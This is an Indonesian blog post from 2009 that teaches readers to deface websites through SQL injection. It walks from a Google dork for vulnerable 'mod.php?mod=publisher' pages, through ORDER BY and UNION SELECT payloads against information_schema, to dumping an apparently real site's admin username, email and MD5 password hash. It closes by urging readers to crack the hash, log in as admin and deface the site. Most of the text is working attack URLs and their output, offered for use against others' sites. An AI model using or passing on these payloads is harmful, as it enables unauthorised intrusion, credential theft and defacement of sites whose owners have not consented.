Cara Deface dengan SQL Inject
Neh cara SQL Inject
kali ini q bakal nunjukin cara hack salah satu situs yang ada.
Pertama, cari target
untuk mencari target: inurl:"mod.php?mod=publisher di saudara mb4h yaitu google
Misal:http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=1
Kedua, cari bug nya
Misal:http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=1
Ketiga, cek apakah ada kutunya
Jadinya:http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=1'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/situspor/public_html/mod/publisher/publisher.php on line 207
ok berarti kutunya ada...
Keempat, mulai beraksi... kita pake perintah order
http://www.situsportal.com/mod.php?m...=-1+order+by+1 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+2 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+3 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+5 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+6 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+7 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+8 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+9 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+10 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+11 <---gak ada error
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+12 <---ada error
Ok, kita tau kalo web itu ada 11 kolom
Kelima, kita pake perintah union buat munculin Adwisatya mAgic Number hehe....
http://www.situsportal.com/mod.php?m...,7,8,9,10,11--
ok, nomor yang muncul n paling jelas no 4
Keenam, cek verinya pake @@version
http://www.situsportal.com/mod.php?m...,7,8,9,10,11--
ok, kita liat 5.0.67-community
Mode girang [on]
Ketuju, kita cari tau nama tabel pake group_concat(table_name) from information_schema.tables+where+table_schema=datab ase()
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+union+all+select+1,2,3,group_concat(table_name), 5,6,7,8,9,10,11 from information_schema.tables+where+table_schema=datab ase()--
authors,banner,bannerclient,bannerfinish,counter,l blocks,main_page_content,menu,mod_gallery_albums,m od_gallery_galleries,mod_gallery_media,mod_iklanba ris,mod_iklanbaris_categories,mod_katalog,mod_kata log_categories,mod_katalog_validate,mod_newsfeed,m od_poll_comments,mod_poll_data,mod_poll_flag,mod_p ublisher,mod_publisher_categories,mod_pub
keliatankan??? hm... kayaknya ada yg berharga authors
Kedelapan, kita cari tahu nama kolom dalam tabel authors pake group_concat(column_name) from information_schema.columns+where+table_name=ohex nama tabel)
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11%20from%20information_schema.colum ns+where+table_name=0x616B6269645F617574686F7273
ok, kelihatan kan??
aid,name,url,email,pwd,counter
Kesembilan, kita lihat isi dari kolom diatas...
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+union+all+select+1,2,3,group_concat(namakolom),5 ,6,7,8,9,10,11%20from namatable
jadinya:
http://www.situsportal.com/mod.php?mod=publisher&op=viewarticle&artid=-1+union+all+select+1,2,3,group_concat(aid,0x3a,nam e,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),5,6,7 ,8,9,10,11%20from%20authors
jelas nih:
admin:admin::info@situsportal.com:48fbcf63efda8f6f 97a50e1f669e6aa2:251
admin = username untuk login
info@situsportal.com = email admin (kalo mau ngasih tau, tapi udah telat, coz udah q kasih tau)
48fbcf63efda8f6f97a50e1f669e6aa2 = password dalam md5 crack,coba cari di mbah google yah.
Kesepuluh, login jadi admin
http://www.situsportal.com/admin
Kesebelas.... tunjukkan xpresi lo... devil mode [on]
pilih salah satu, jika masih tidak bisa... lakukan seperti langkah - langkah diatas..
Jangan putus asa ya cu....
Saturday, June 13, 2009
Subscribe to:
Post Comments (Atom)
Artikel ini berisi 0 komentar:
Post a Comment